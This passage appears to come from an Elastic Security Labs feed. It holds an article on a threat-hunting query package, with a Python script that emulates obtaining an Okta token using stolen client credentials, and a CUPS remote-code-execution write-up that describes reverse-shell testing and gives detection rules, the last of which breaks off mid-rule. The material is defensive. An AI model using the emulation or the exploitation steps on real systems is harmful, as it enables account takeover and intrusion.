<p>These hunting queries can be found under the <a href="https://github.com/elastic/detection-rules/tree/main/hunting">Hunting</a> package. This initiative is designed to empower our community with specialized threat hunting queries and resources across multiple platforms, complementing our robust SIEM and EDR ruleset. These are developed to be consistent with the paradigms and methodologies we discuss in the Elastic <a href="https://www.elastic.co/es/security/threat-hunting">Threat Hunting guide</a>.</p>
<h2>Why Threat Hunting?</h2>
<p>Threat hunting is a proactive approach to security that involves searching for hidden threats that evade conventional detection solutions while assuming breach. At Elastic, we recognize the importance of threat hunting in strengthening security defenses and are committed to facilitating this critical activity.</p>
<p>While we commit a substantial amount of time and effort towards building out resilient detections, we understand that alerting on malicious behavior is only one part of an effective overall strategy. Threat hunting moves the needle to the left, allowing for a more proactive approach to understanding and securing the environment.</p>
<p>The idea is that the rules and hunt queries will supplement each other in many ways. Most  hunts also serve as great pivot points once an alert has triggered, as a powerful means to ascertain related details and paint a full picture. They are just as useful when it comes to triaging as proactively hunting.</p>
<p>Additionally, we often find ourselves writing resilient and robust logic that just doesn’t meet the criteria for a rule, whether it is too noisy or not specific enough. This will serve as an additional means to preserve the value of these research outcomes in the form of these queries.</p>
<h2>What We Are Providing</h2>
<p>The new Hunting package provides a diverse range of hunting queries targeting all the same  environments as our rules do, and potentially even more, including:</p>
<ul>
<li>Endpoints (Windows, Linux, macOS)</li>
<li>Cloud (CSPs, SaaS providers, etc.)</li>
<li>Network</li>
<li>Large Language Models (LLM)</li>
<li>Any other Elastic <a href="https://www.elastic.co/es/integrations">integration</a> or datasource that adds value</li>
</ul>
<p>These queries are crafted by our security experts to help you gather initial data that is required to test your hypothesis during your hunts. These queries also include names and descriptions that may be a starting point for your hunting efforts as well. All of this valuable information is then stored in an index file (both YAML and Markdown) for management, ease-of-use and centralizing our collection of hunting queries.</p>
<h3>Hunting Package</h3>
<p>The Hunting package has also been made to be its own module within Detection Rules with a few simple commands for easy management and searching throughout the catalogue of hunting queries. Our goal is not to provide an out-of-the-box hunting tool, but rather a foundation for programmatically managing and eventually leveraging these hunting queries.</p>
<p>Existing Commands:</p>
<p><strong>Generate Markdown</strong> - Load TOML files or path of choice and convert to Markdown representation in respective locations.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image6.png" alt="" /></p>
<p><strong>Refresh Index</strong> - Refresh indexes from the collection of queries, both YAML and Markdown.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image4.png" alt="" /></p>
<p><strong>Search</strong> - Search for hunting queries based on MITRE tactic, technique or subtechnique IDs. Also includes the ability to search per data source.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image5.png" alt="" /></p>
<p><strong>Run Query</strong> - Run query of choice against a particular stack to identify hits (requires pre-auth). Generates a search link for easy pivot.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image8.png" alt="" /></p>
<p><strong>View Hunt</strong>- View a hunting file in TOML or JSON format.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image7.png" alt="" /></p>
<p><strong>Hunt Summary</strong>- Generate count statistics based on breakdown of integration, platform, or language
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image2.png" alt="" /></p>
<h2>Benefits of these Hunt Queries</h2>
<p>Each hunting query will be saved in its respective TOML file for programmatic use, but also have a replicated markdown file that serves as a quick reference for manual tasks or review. We understand that while automation is crucial to hunting maturity, often hunters may want a quick and easy copy-paste job to reveal events of interest. Our collection of hunt queries and CLI options offers several advantages to both novice and experienced threat hunters. Each query in the library is designed to serve as a powerful tool for detecting hidden threats, as well as offering additional layers of investigation during incident response.</p>
<ul>
<li>Programmatic and Manual Flexibility: Each query is structured in a standardized TOML format for programmatic use, but also offers a Markdown version for those who prefer manual interaction.</li>
<li>Scalable queries: Our hunt queries are designed with scalability in mind, leveraging the power of Elastic’s versatile and latest query languages such as ES|QL. This scalability ensures that you can continuously adapt your hunting efforts as your organization’s infrastructure grows, maintaining high levels of visibility and security.</li>
<li>Integration with Elastic’s Product: These queries integrate with the Elastic Stack and our automation enables you to test quickly, enabling you to pivot through Elastic’s Security UI for deeper analysis.</li>
<li>Diverse Query Types Available: Out hunt queries support a wide variety of query languages, including KQL, EQL, ES|QL, OsQuery, and YARA, making them adaptable across different data sources and environments. Whether hunting across endpoints, cloud environments, or specific integrations like Okta or LLMs, users can leverage the right language for their unique needs.</li>
<li>Extended Coverage for Elastic Prebuilt Rules: While Elastic’s prebuilt detection rules offer robust coverage, there are always scenarios where vendor detection logic may not fully meet operational needs due to the specific environment or nature of the threat. These hunting queries help to fill in those gaps by offering broader and more nuanced coveraged, particularly for behaviors that don’t nearly fit into rule-based detections.</li>
<li>Stepping stone for hunt initialization or pivoting: These queries serve as an initial approach to kickstart investigations or pivot from initial findings. Whether used proactively to identify potential threats or reactively to expand upon triggered alerts, these queries can provide additional context and insights based on threat hunter hypothesis and workflows.</li>
<li>MITRE ATT&amp;CK Alignment: Every hunt query includes MITRE ATT&amp;CK mappings to provide contextual insight and help prioritize the investigation of threats according to threat behaviors.</li>
<li>Community and Maintenance: This hunting module lives within the broader Elastic Detection Rules repository, ensuring continual updates alongside our prebuilt rules. Community contributions also enable our users to collaborate and expand unique ways to hunt.</li>
</ul>
<p>As we understand the fast-paced nature of hunting and need for automation, we have included searching capabilities and a run option to quickly identify if you have matching results from any hunting queries in this library.</p>
<h2>Details of Each Hunting Analytic</h2>
<p>Each hunting search query in our repository includes the following details to maximize its effectiveness and ease of use:</p>
<ul>
<li><strong>Data Source or Integration</strong>: The origin of the data utilized in the hunt.</li>
<li><strong>Name</strong>: A descriptive title for the hunting query.</li>
<li><strong>Hypothesis</strong>: The underlying assumption or threat scenario the hunt aims to investigate. This is representated as the description.</li>
<li><strong>Query(s)</strong>: Provided in one of several formats, including ES|QL, EQL, KQL, or OsQuery.</li>
<li><strong>Notes</strong>: Additional information on how to pivot within the data, key indicators to watch for, and other valuable insights.</li>
<li><strong>References</strong>: Links to relevant resources and documentation that support the hunt.</li>
<li><strong>Mapping to MITRE ATT&amp;CK</strong>: How the hunt correlates to known tactics, techniques, and procedures in the MITRE ATT&amp;CK framework.</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image9.png" alt="" /></p>
<p>For those who prefer a more hands-on approach, we also provide TOML files for programmatic consumption. Additionally, we offer an easy converter to Markdown for users who prefer to manually copy and paste the hunts into their systems.</p>
<h3>Hunting Query Creation Example:</h3>
<p>In the following example, we will explore a basic hunting cycle for the purpose of creating a new hunting query that we want to use in later hunting cycles. Note that this is an oversimplified hunting cycle that may require several more steps in a real-world application.</p>
<p><strong>Hypothesis</strong>: We assume that a threat adversary (TA) is targeting identity providers (IdPs), specifically Okta, by compromising cloud accounts by identifying runtime instances in CI/CD pipelines that use client credentials for authentication with Okta’s API. Their goal is to identify unsecure credentials, take these and obtain an access token whose assumed credentials are tied to an Okta administrator.</p>
<p><strong>Evidence</strong>: We suspect that in order to identify evidence of this, we need Okta system logs that report API activity, specifically any public client app sending access token requests where the grant type provided are client credentials. We also suspect that because the TA is unaware of the mapped OAuth scopes for this application, that when the access token request is sent, it may fail due to the incorrect OAuth scopes being explicitly sent. We also know that demonstrating proof-of-possession (DPoP) is not required for our client applications during authentication workflow because doing so would be disruptive to operations so we prioritize operability over security.</p>
<p>Below is the python code used to emulate the behavior of attempting to get an access token with stolen client credentials where the scope is <code>okta.trustedOrigins.manage</code> so the actor can add a new cross-origins (CORS) policy and route client authentication through their own server.</p>
<pre><code>import requests

okta_domain = &quot;TARGET_DOMAIN&quot;
client_id = &quot;STOLEN_CLIENT_ID&quot;
client_secret = &quot;STOLEN_CLIENT_CREDENTIALS&quot;

# Prepare the request
auth_url = f&quot;{okta_domain}/oauth2/default/v1/token&quot;
auth_data = {
    &quot;grant_type&quot;: &quot;client_credentials&quot;,
    &quot;scope&quot;: &quot;okta.trustedOrigins.manage&quot; 
}
auth_headers = {
    &quot;Accept&quot;: &quot;application/json&quot;,
    &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,
    &quot;Authorization&quot;: f&quot;Basic {client_id}:{client_secret}&quot;
}
# Make the request
response = requests.post(auth_url, headers=auth_headers, data=auth_data)

# Handle the response
if response.ok:
    token = response.json().get(&quot;access_token&quot;)
    print(f&quot;Token: {token}&quot;)
else:
    print(f&quot;Error: {response.text}&quot;)
</code></pre>
<p>Following this behavior, we formulate a query as such for hunting where we filter out some known client applications like DataDog and Elastic’s Okta integrations.</p>
<pre><code>from logs-okta.system*
| where @timestamp &gt; NOW() - 7 day
| where
    event.dataset == &quot;okta.system&quot;

    // filter on failed access token grant requests where source is a public client app
    and event.action == &quot;app.oauth2.as.token.grant&quot;
    and okta.actor.type == &quot;PublicClientApp&quot;
    and okta.outcome.result == &quot;FAILURE&quot;

    // filter out known Elastic and Datadog actors
    and not (
        okta.actor.display_name LIKE &quot;Elastic%&quot;
        or okta.actor.display_name LIKE &quot;Datadog%&quot;
    )

    // filter for scopes that are not implicitly granted
    and okta.outcome.reason == &quot;no_matching_scope&quot;
</code></pre>
<p>As shown below, we identify matching results and begin to pivot and dive deeper into this investigation, eventually involving incident response (IR) and escalating appropriately.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image10.png" alt="" /></p>
<p>During our after actions report (AAR), we take note of the query that helped identify these compromised credentials and decide to preserve this as a hunting query in our forked Detection Rules repository. It doesn’t quite make sense to create a detection rule based on the fidelity of this and knowing the constant development work we do with custom applications that interact with the Okta APIs, therefore we reserve it as a hunting query.</p>
<p>Creating a new hunting query TOML file in the <code>hunting/okta/queries</code> package, we add the following information:</p>
<pre><code>author = &quot;EvilC0rp Defenders&quot;
description = &quot;&quot;&quot;Long Description of Hunt Intentions&quot;&quot;&quot;
integration = [&quot;okta&quot;]
uuid = &quot;0b936024-71d9-11ef-a9be-f661ea17fbcc&quot;
name = &quot;Failed OAuth Access Token Retrieval via Public Client App&quot;
language = [&quot;ES|QL&quot;]
license = &quot;Apache License 2.0&quot;
notes = [Array of useful notes from our investigation]
mitre = ['T1550.001']
query = [Our query as shown above]
</code></pre>
<p>With the file saved we run <code>python -m hunting generate-markdown FILEPATH</code> to generate the markdown version of it in <code>hunting/okta/docs/</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image1.png" alt="" /></p>
<p>Once saved, we can view our new hunting content by using the <code>view-rule</code> command or search for it by running the <code>search</code> command, specifying Okta as the data source and <a href="https://attack.mitre.org/techniques/T1550/001/">T1550.001</a> as the subtechnique we are looking for.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image7.png" alt="" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image5.png" alt="" /></p>
<p>Last but not least, we can check that the query runs successfully by using the <code>run-query</code> command as long as we save a <code>.detection-rules-cfg-yaml</code> file with our Elasticsearch authentication details, which will tell us if we have matching results or not.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image8.png" alt="" /></p>
<p>Now we can refresh our hunting indexes with the <code>refresh-index</code> command and ensure that our markdown file has been created.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image11.png" alt="" /></p>
<h2>How We Plan to Expand</h2>
<p>Our aim is to continually enhance the Hunting package with additional queries, covering an even wider array of threat scenarios. We will update this resource based on:</p>
<ul>
<li><strong>Emerging Threats</strong>: Developing new queries as new types of cyber threats arise.</li>
<li><strong>Community Feedbac</strong>k: Incorporating suggestions and improvements proposed by our community.</li>
<li><strong>Fill Gaps Where Traditional alerting Fails</strong>: While we understand the power of our advanced SIEM and EDR, we also understand how some situations favor hunting instead.</li>
<li><strong>Longevity and Maintenance</strong>: Our hunting package lives within the very same repository we actively manage our out-of-the-box (OOTB) prebuilt detection rules for the Elastic SIEM. As a result, we plan to routinely add and update our hunting resources.</li>
<li><strong>New Features</strong>: Develop new features and commands to aid users with the repository of their hunting efforts.</li>
</ul>
<p>Our expansion would not be complete without sharing to the rest of the community in an effort to provide value wherever possible. The adoption of these resources or even paradigms surrounding threat scenarios is an important effort by our team to help hunting efforts.</p>
<p>Lastly, we acknowledge and applaud the existing hunting efforts done or in-progress by our industry peers and community. We also acknowledge that maintaining such a package of hunting analytics and/or queries requires consistency and careful planning. Thus this package will receive continued support and additional hunting queries added over time, often aligning with our detection research efforts or community submissions!</p>
<h2>Get Involved</h2>
<p>Explore the Hunting resources, utilize the queries and python package, participate in our community discussion forums to share your experiences and contribute to the evolution of this resource. Your feedback is crucial for us to refine and expand our offerings.</p>
<ul>
<li><a href="https://elasticstack.slack.com/archives/C016E72DWDS">Detection Rules Community Slack Channel</a></li>
<li>Hunting “<a href="https://github.com/elastic/detection-rules/tree/main/hunting">Getting Started</a>” Doc</li>
<li><a href="https://twitter.com/elasticseclabs">Elastic Security Labs</a> on X</li>
</ul>
<h2>Conclusion</h2>
<p>With the expansion of these hunting resources, Elastic reaffirms its commitment to advancing cybersecurity defenses. This resource is designed for both experienced threat hunters and those new to the field, providing the tools needed to detect and mitigate sophisticated cyber threats effectively.</p>
<p>Stay tuned for more updates, and happy hunting!</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/elevate-your-threat-hunting.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Cups Overflow: When your printer spills more than Ink]]></title>
            <link>https://www.elastic.co/es/security-labs/cups-overflow</link>
            <guid>cups-overflow</guid>
            <pubDate>Sat, 28 Sep 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.]]></description>
            <content:encoded><![CDATA[<h2>Update October 2, 2024</h2>
<p>The following packages introduced out-of-the-box (OOTB) rules to detect the exploitation of these vulnerabilities. Please check your &quot;Prebuilt Security Detection Rules&quot; integration versions or visit the <a href="https://www.elastic.co/es/guide/en/security/current/prebuilt-rules-downloadable-updates.html">Downloadable rule updates</a> site.</p>
<ul>
<li>Stack Version 8.15 - Package Version 8.15.6+</li>
<li>Stack Version 8.14 - Package Version 8.14.12+</li>
<li>Stack Version 8.13 - Package Version 8.13.18+</li>
<li>Stack Version 8.12 - Package Version 8.12.23+</li>
</ul>
<h2>Key takeaways</h2>
<ul>
<li>On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) disclosed multiple vulnerabilities affecting the <code>cups-browsed</code>, <code>libscupsfilters</code>, and <code>libppd</code> components of the CUPS printing system, impacting versions &lt;= 2.0.1.</li>
<li>The vulnerabilities allow an unauthenticated remote attacker to exploit the printing system via IPP (Internet Printing Protocol) and mDNS to achieve remote code execution (RCE) on affected systems.</li>
<li>The attack can be initiated over the public internet or local network, targeting the UDP port 631 exposed by <code>cups-browsed</code> without any authentication requirements.</li>
<li>The vulnerability chain includes the <code>foomatic-rip</code> filter, which permits the execution of arbitrary commands through the <code>FoomaticRIPCommandLine</code> directive, a known (<a href="https://nvd.nist.gov/vuln/detail/CVE-2011-2697">CVE-2011-2697</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2011-2964">CVE-2011-2964</a>) but unpatched issue since 2011.</li>
<li>Systems affected include most GNU/Linux distributions, BSDs, ChromeOS, and Solaris, many of which have the <code>cups-browsed</code> service enabled by default.</li>
<li>By the title of the publication, “Attacking UNIX Systems via CUPS, Part I” Margaritelli likely expects to publish further research on the topic.</li>
<li>Elastic has provided protections and guidance to help organizations detect and mitigate potential exploitation of these vulnerabilities.</li>
</ul>
<h2>The CUPS RCE at a glance</h2>
<p>On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/">uncovered</a> a chain of critical vulnerabilities in the CUPS (Common Unix Printing System) utilities, specifically in components like <code>cups-browsed</code>, <code>libcupsfilters</code>, and <code>libppd</code>. These vulnerabilities — identified as <a href="https://www.cve.org/CVERecord?id=CVE-2024-47176">CVE-2024-47176</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2024-47076">CVE-2024-47076</a>, <a href="https://www.cve.org/CVERecord?id=CVE-2024-47175">CVE-2024-47175</a>, and <a href="https://www.cve.org/CVERecord?id=CVE-2024-47177">CVE-2024-47177</a> — affect widely adopted UNIX systems such as GNU/Linux, BSDs, ChromeOS, and Solaris, exposing them to remote code execution (RCE).</p>
<p>At the core of the issue is the lack of input validation in the CUPS components, which allows attackers to exploit the Internet Printing Protocol (IPP). Attackers can send malicious packets to the target's UDP port <code>631</code> over the Internet (WAN) or spoof DNS-SD/mDNS advertisements within a local network (LAN), forcing the vulnerable system to connect to a malicious IPP server.</p>
<p>For context, the IPP is an application layer protocol used to send and receive print jobs over the network. These communications include sending information regarding the state of the printer (paper jams, low ink, etc.) and the state of any jobs. IPP is supported across all major operating systems including Windows, macOS, and Linux. When a printer is available, the printer broadcasts (via DNS) a message stating that the printer is ready including its Uniform Resource Identifier (URI). When Linux workstations receive this message, many Linux default configurations will automatically add and register the printer for use within the OS. As such, the malicious printer in this case will be automatically registered and made available for print jobs.</p>
<p>Upon connecting, the malicious server returns crafted IPP attributes that are injected into PostScript Printer Description (PPD) files, which are used by CUPS to describe printer properties. These manipulated PPD files enable the attacker to execute arbitrary commands when a print job is triggered.</p>
<p>One of the major vulnerabilities in this chain is the <code>foomatic-rip</code> filter, which has been known to allow arbitrary command execution through the FoomaticRIPCommandLine directive. Despite being vulnerable for over a decade, it remains unpatched in many modern CUPS implementations, further exacerbating the risk.</p>
<blockquote>
<p>While these vulnerabilities are highly critical with a CVSS score as high as 9.9, they can be mitigated by disabling cups-browsed, blocking UDP port 631, and updating CUPS to a patched version. Many UNIX systems have this service enabled by default, making this an urgent issue for affected organizations to address.</p>
</blockquote>
<h2>Elastic’s POC analysis</h2>
<p>Elastic’s Threat Research Engineers initially located the original proof-of-concept written by @evilsocket, which had been leaked. However, we chose to utilize the <a href="https://github.com/RickdeJager/cupshax/blob/main/cupshax.py">cupshax</a> proof of concept (PoC) based on its ability to execute locally.</p>
<p>To start, the PoC made use of a custom Python class that was responsible for creating and registering the fake printer service on the network using mDNS/ZeroConf. This is mainly achieved by creating a ZeroConf service entry for the fake Internet Printing Protocol (IPP) printer.</p>
<p>Upon execution, the PoC broadcasts a fake printer advertisement and listens for IPP requests. When a vulnerable system sees the broadcast, the victim automatically requests the printer's attributes from a URL provided in the broadcast message. The PoC responds with IPP attributes including the FoomaticRIPCommandLine parameter, which is known for its history of CVEs. The victim generates and saves a <a href="https://en.wikipedia.org/wiki/PostScript_Printer_Description">PostScript Printer Description</a> (PPD) file from these IPP attributes.</p>
<p>At this point, continued execution requires user interaction to start a print job and choose to send it to the fake printer. Once a print job is sent, the PPD file tells CUPS how to handle the print job. The included FoomaticRIPCommandLine directive allows the arbitrary command execution on the victim machine.</p>
<p>During our review and testing of the exploits with the Cupshax PoC, we identified several notable hurdles and key details about these vulnerable endpoint and execution processes.</p>
<p>When running arbitrary commands to create files, we noticed that <code>lp</code> is the user and group reported for arbitrary command execution, the <a href="https://wiki.debian.org/SystemGroups#:~:text=lp%20(LP)%3A%20Members%20of,jobs%20sent%20by%20other%20users.">default printing group</a> on Linux systems that use CUPS utilities. Thus, the Cupshax PoC/exploit requires both the CUPS vulnerabilities and the <code>lp</code> user to have sufficient permissions to retrieve and run a malicious payload. By default, the <code>lp</code> user on many systems will have these permissions to run effective payloads such as reverse shells; however, an alternative mitigation is to restrict <code>lp</code> such that these payloads are ineffective through native controls available within Linux such as AppArmor or SELinux policies, alongside firewall or IPtables enforcement policies.</p>
<p>The <code>lp</code> user in many default configurations has access to commands that are not required for the print service, for instance <code>telnet</code>. To reduce the attack surface, we recommend removing unnecessary services and adding restrictions to them where needed to prevent the <code>lp</code> user from using them.</p>
<p>We also took note that interactive reverse shells are not immediately supported through this technique, since the <code>lp</code> user does not have a login shell; however, with some creative tactics, we were able to still accomplish this with the PoC. Typical PoCs test the exploit by writing a file to <code>/tmp/</code>, which is trivial to detect in most cases. Note that the user writing this file will be <code>lp</code> so similar behavior will be present for attackers downloading and saving a payload on disk.</p>
<p>Alongside these observations, the parent process, <code>foomatic-rip</code> was observed in our telemetry executing a shell, which is highly uncommon</p>
<h2>Executing the ‘Cupshax’ POC</h2>
<p>To demonstrate the impact of these vulnerabilities, we attempted to accomplish two different scenarios: using a payload for a reverse shell using living off the land techniques and retrieving and executing a remote payload. These actions are often common for adversarial groups to attempt to leverage once a vulnerable system is identified. While in its infancy, widespread exploitation has not been observed, but likely will replicate some of the scenarios depicted below.</p>
<p>Our first attempts running the Cupshax PoC were met with a number of minor roadblocks due to the default user groups assigned to the <code>lp</code> user — namely restrictions around interactive logon, an attribute common to users that require remote access to systems. This did not, however, impact our ability to download a remote payload, compile, and execute on the impacted host system:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/video1.gif" alt="A remotely downloaded payload, compiled and executed on a vulnerable host" title="A remotely downloaded payload, compiled and executed on a vulnerable host" /></p>
<p>Continued testing was performed around reverse shell invocation, successfully demonstrated below:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/video2.gif" alt="A reverse shell executed on a vulnerable host" title="A reverse shell executed on a vulnerable host" /></p>
<h2>Assessing impact</h2>
<ul>
<li><strong>Severity:</strong> These vulnerabilities are given CVSS scores <a href="https://x.com/evilsocket/status/1838220677389656127">controversially</a> up to 9.9, indicating a critical severity. The widespread use of CUPS and the ability to remotely exploit these vulnerabilities make this a high-risk issue.</li>
<li><strong>Who is affected?:</strong> The vulnerability affects most UNIX-based systems, including major GNU/Linux distributions and other operating systems like ChromeOS and BSDs running the impacted CUPS components. Public-facing or network-exposed systems are particularly at risk. Further guidance, and notifications will likely be provided by vendors as patches become available, alongside further remediation steps. Even though CUPS usually listens on localhost, the Shodan Report <a href="https://x.com/shodanhq/status/1839418045757845925">highlights</a> that over 75,000 CUPS services are exposed on the internet.</li>
<li><strong>Potential Damage:</strong> Once exploited, attackers can gain control over the system to run arbitrary commands. Depending on the environment, this can lead to data exfiltration, ransomware installation, or other malicious actions. Systems connected to printers over WAN are especially at risk since attackers can exploit this without needing internal network access.</li>
</ul>
<h2>Remediations</h2>
<p>As <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Remediation">highlighted</a> by @evilsocket, there are several remediation recommendations.</p>
<ul>
<li>Disable and uninstall the <code>cups-browsed</code> service. For example, see the recommendations from <a href="https://www.redhat.com/en/blog/red-hat-response-openprinting-cups-vulnerabilities">Red Hat</a> and <a href="https://ubuntu.com/blog/cups-remote-code-execution-vulnerability-fix-available">Ubuntu</a>.</li>
<li>Ensure your CUPS packages are updated to the latest versions available for your distribution.</li>
<li>If updating isn’t possible, block UDP port <code>631</code> and DNS-SD traffic from potentially impacted hosts, and investigate the aforementioned recommendations to further harden the <code>lp</code> user and group configuration on the host.</li>
</ul>
<h2>Elastic protections</h2>
<p>In this section, we look into detection and hunting queries designed to uncover suspicious activity linked to the currently published vulnerabilities. By focusing on process behaviors and command execution patterns, these queries help identify potential exploitation attempts before they escalate into full-blown attacks.</p>
<h3>cupsd or foomatic-rip shell execution</h3>
<p>The first detection rule targets processes on Linux systems that are spawned by <code>foomatic-rip</code> and immediately launch a shell. This is effective because legitimate print jobs rarely require shell execution, making this behavior a strong indicator of malicious activity. Note: A shell may not always be an adversary’s goal if arbitrary command execution is possible.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and
 event.action == &quot;exec&quot; and process.parent.name == &quot;foomatic-rip&quot; and
 process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) 
 and not process.command_line like (&quot;*/tmp/foomatic-*&quot;, &quot;*-sDEVICE=ps2write*&quot;)
</code></pre>
<p>This query managed to detect all 33 PoC attempts that we performed:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image6.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml</a></p>
<h3>Printer user (lp) shell execution</h3>
<p>This detection rule assumes that the default printer user (<code>lp</code>) handles the printing processes. By specifying this user, we can narrow the scope while broadening the parent process list to include <code>cupsd</code>. Although there's currently no indication that RCE can be exploited through <code>cupsd</code>, we cannot rule out the possibility.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and
 event.action == &quot;exec&quot; and user.name == &quot;lp&quot; and
 process.parent.name in (&quot;cupsd&quot;, &quot;foomatic-rip&quot;, &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, 
 &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and process.name in (&quot;bash&quot;, &quot;dash&quot;, 
 &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;) and not process.command_line 
 like (&quot;*/tmp/foomatic-*&quot;, &quot;*-sDEVICE=ps2write*&quot;)
</code></pre>
<p>By focusing on the username <code>lp</code>, we broadened the scope and detected, like previously, all of the 33 PoC executions:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image5.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml</a></p>
<h3>Network connection by CUPS foomatic-rip child</h3>
<p>This rule identifies network connections initiated by child processes of <code>foomatic-rip</code>, which is a behavior that raises suspicion. Since legitimate operations typically do not involve these processes establishing outbound connections, any detected activity should be closely examined. If such communications are expected in your environment, ensure that the destination IPs are properly excluded to avoid unnecessary alerts.</p>
<pre><code>sequence by host.id with maxspan=10s
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; 
   and event.action == &quot;exec&quot; and
   process.parent.name == &quot;foomatic-rip&quot; and
   process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;)] 
   by process.entity_id
  [network where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;connection_attempted&quot;] by process.parent.entity_id
</code></pre>
<p>By capturing the parent/child relationship, we ensure the network connections originate from the potentially compromised application.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image7.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/command_and_control_cupsd_foomatic_rip_netcon.toml</a></p>
<h3>File creation by CUPS foomatic-rip child</h3>
<p>This rule detects suspicious file creation events initiated by child processes of foomatic-rip. As all current proof-of-concepts have a default testing payload of writing to a file in <code>/tmp/</code>, this rule would catch that. Additionally, it can detect scenarios where an attacker downloads a malicious payload and subsequently creates a file.</p>
<pre><code>sequence by host.id with maxspan=10s
  [process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
   event.action == &quot;exec&quot; and process.parent.name == &quot;foomatic-rip&quot; and 
   process.name in (&quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;)] by process.entity_id
  [file where host.os.type == &quot;linux&quot; and event.type != &quot;deletion&quot; and
   not (process.name == &quot;gs&quot; and file.path like &quot;/tmp/gs_*&quot;)] by process.parent.entity_id
</code></pre>
<p>The rule excludes <code>/tmp/gs_*</code> to account for default <code>cupsd</code> behavior, but for enhanced security, you may choose to remove this exclusion, keeping in mind that it may generate more noise in alerts.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image1.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml</a></p>
<h3>Suspicious execution from foomatic-rip or cupsd parent</h3>
<p>This rule detects suspicious command lines executed by child processes of <code>foomatic-rip</code> and <code>cupsd</code>. It focuses on identifying potentially malicious activities, including persistence mechanisms, file downloads, encoding/decoding operations, reverse shells, and shared-object loading via GTFOBins.</p>
<pre><code>process where host.os.type == &quot;linux&quot; and event.type == &quot;start&quot; and 
 event.action == &quot;exec&quot; and process.parent.name in 
 (&quot;foomatic-rip&quot;, &quot;cupsd&quot;) and process.command_line like (
  // persistence
